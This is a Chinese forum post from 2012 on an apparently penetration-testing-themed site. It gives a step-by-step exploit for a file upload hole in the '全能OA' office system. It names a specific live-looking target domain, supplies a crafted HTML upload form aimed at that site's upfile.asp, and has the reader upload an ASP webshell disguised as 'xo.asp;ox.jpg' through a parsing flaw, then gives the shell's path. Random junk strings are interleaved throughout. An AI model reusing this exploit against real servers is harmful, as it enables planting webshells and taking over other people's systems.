中国网络渗透测试联盟
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:45
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
+ u5 J! t$ U% u8 `2 P% Y/ F
\. v* c7 d& B, L0 J& T
系统介绍:
/ J l7 A/ n5 [/ ^9 d
+ S; g4 G* M0 k
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
# ]* y$ m, S2 s- n; P
4 c {4 s" \; z; T0 Y
主要功能:
6 _5 E1 X" y- z! N2 @
公司通告
2 k5 f% m+ D/ U* c& q- D* m. G
工作计划
5 J1 n+ _' }6 T: p! ]
通讯助理
# V3 w9 y% o3 J
客户资源
2 f8 G- K% @* F+ t7 r0 X: \
我的公文
1 w, m5 ]& I7 ?1 p
公文传阅
0 H% r& x' G% U. A& g& K, N
公共资源
) U0 t5 Y+ y5 Y3 P7 s
资源预约
( _5 w4 y4 l- d4 ?
今日考勤
8 S) ^9 H2 b4 w% u3 a1 Q9 n" y
个人计划
) c) |$ p& g/ A' C$ K
个人通讯录
+ U+ {5 F1 A2 T+ n: T5 Q) q4 d
个人基本档案
! Y. m+ z* z2 a( E3 |
未读邮件
. V8 x2 M1 G8 E. R) w9 s
发邮件
! W: I' x5 @) w* z: l, I6 N1 k8 r
收件夹
+ Y8 D7 q' c! _3 t
寄件夹
/ w4 e" `% ?5 Q) V" m/ U8 c
网络硬盘
2 n$ b0 i6 }, D+ Z
网络会议
9 |3 W8 }4 ]( M2 @2 y
网络调查
$ Y6 s# Y8 o5 I8 G% l( b/ O
交流论坛
+ a6 u2 g# \0 y( z
; S2 D* p! [/ ?8 }
有兴趣测试的朋友可以下源码看看
4 h2 P; h6 d0 ?+ _9 W! O: A
' y) e6 `- a0 w# C8 z& `! ^+ S* t: H9 m. ?
源码下载:
4 U: e6 w8 _6 K/ a X& Z0 W& ~) a
* R% J5 d& _0 |! v4 _& B5 s
http://www.mycodes.net/30/4750.htm
( ]1 R/ [+ _6 S+ x
- D" w$ Y9 T- [7 n& {6 |1 `
漏洞介绍:
! U7 L! T# _& A# ~5 i# o% L" |
3 |7 ~- }* m8 x |4 \3 T
由upfile.asp上传文件漏洞引起
( R6 Z9 N$ j( B1 w+ S
4 _1 k1 s; u2 m) w8 N
测试方法:
; r* X; O3 Y% i$ O- J
$ k, `' o% Z7 z; C
使用名小子上传
http://www.itlynn.com/upfile.asp
即可
- ^6 g8 D c {4 K, f
/ {( X: c1 \5 y D5 \
如果upfile.asp文件被删除不存在。
) Z0 T6 a- J7 l5 z2 n- H+ _
% i+ E) g% x# O! f: t6 |( k1 A8 G# q, |
那么可以试着访问
http://www.itlynn.com/upfile/upfile.asp
。
2 N* _6 K) S' n- L6 W3 h
: z1 N% v: j" i* c
如果存在那么将如下代码保存为upfile.html。
- |- n: J! n9 Q1 e9 `. C
9 l& q; J: g+ K+ C$ Q) m/ I
然后将action的参数修改为目标站点的url。例如
http://www.itlynn.com/upfile/upfile.asp
。
; |( ?$ y: s3 a" `
& L9 \* q. V- S3 k( c
* i8 b6 Z- y- ^
X- t! P( x9 A7 g4 [
01 <table border='0' align="center" cellpadding="5">
2 J# S2 J9 M! ?, F) i y' b
; Y$ W0 M7 W n5 [1 T+ n) w
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
; A; Z+ A: a ?& G- ~! K" k) P
7 e1 I" K. |& E% K( G9 U( Z$ G) O/ T
03 <tr>
+ O3 \5 Z: K8 q/ l
9 N8 H) l- o3 S$ f6 m$ L. W$ ?9 ?
04 <td>报错:</td>
' i4 a2 p3 j% P% [8 R: N
, D3 d0 @* C, ~ P( P
05 <td><input type='radio' name='errnumber' value='0'>
- s; r4 j$ `3 j% l$ J
' t4 z) S$ y5 f: `$ e
06 自动更名
$ M$ X x0 o: L' P
5 B2 c1 J* X1 i% G
07 <input type='radio' name='errnumber' value='1' checked>
' B2 w2 ?! v! S5 d" V
' s/ T6 Y1 t. U% O( f9 z
08 报错方式
4 m4 o0 n0 ], l, g' \ u+ M
* ^" Q& t5 h) d( _5 z9 C1 l* z- U
09 <input type='radio' name='errnumber' value='2'>
u$ u2 C9 R/ c
( ~1 S) Q- S% t" y) T2 d( w
10 直接覆盖</td>
' g4 U) E& B% M' G: l- ~4 e
! S* x" ]$ s& u7 C8 X6 V4 a" _
11 </tr>
* z U0 h1 W5 U
1 v7 U' _1 o2 W' ?5 ^! `6 T' l
12 <tr>
$ y- c( S' p+ l8 ~; A# O3 y8 S0 }9 d
+ ?% D- h9 @4 J+ g
13 <td>主题:</td>
. P* Z3 F9 {8 B4 p' D h
/ u2 e0 L9 [. Q
14 <td><input type='text' name='filename' size='30'></td>
# j9 j. U8 a9 ~. K) c
9 \% v8 z9 e/ y, s) L) k
15 </tr>
( {! z3 N2 l4 r3 Y
0 Q8 T V# i5 A! b
16 <tr>
Q- y, t* Y& L0 [. K& M6 C3 h
4 g2 M. G9 v0 W# `# K3 L
17 <td>文件:</td>
9 @# M( J% I$ z2 `8 m
) W, V4 ?* h( F+ h* o" F
18 <td><input type="file"name="fruit"size="30"></td>
9 X$ f# r1 J$ d3 I5 \3 F
# J: @# M( X: S* @' `
19 </tr>
) o+ I5 I8 C# a* r' |4 X0 F5 S6 X+ ~
0 S" ]( u6 V$ u5 u1 A! W
20 <tr>
6 N f4 L, I2 c' C; M) |) ]
9 q/ x1 b- {/ ]( F+ [, q1 z
21 <td valign='top'>简介:</td>
; f2 d* D* w0 |* X) p
; T2 K' h( a+ K q
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
/ e6 @" ~2 z* t+ e
* q- g1 z h; t9 ~# k
23 </tr>
. f3 n& t- `. ~+ { {5 x
# m [4 S7 I) L2 k5 s$ ~6 S
24
/ s, i" Z' g9 `) n4 Q8 C5 A
, x$ Q2 z( ~8 h3 n: G7 `" ~
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
: u6 K ^+ }: C5 d, w+ O/ o
6 k3 G* u% w$ _1 T
26 </tr>
7 r: j- l8 H4 \* C# w
& Q# X0 s! s( y4 | l, G
27 </form>
' {! s3 s6 u2 q8 Q
* U' t2 l o9 V' y/ x0 b! f% W" j
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
, O: z* u8 `) g# z9 z) V5 t
- ?- M8 K# O2 q/ L
& R# M; x% P g' h4 ^
9 C6 u' P4 @8 e# I6 `
上传成功后,马的路径是:
http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
, G( Y5 g {, z$ H7 ^$ x( L
/ }/ F! i6 X: |( f; w
此漏洞需要配合解析漏洞利用。
7 j, B2 M' m. c: T% c( `+ M4 S: u
" O, S: Q Z" n
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2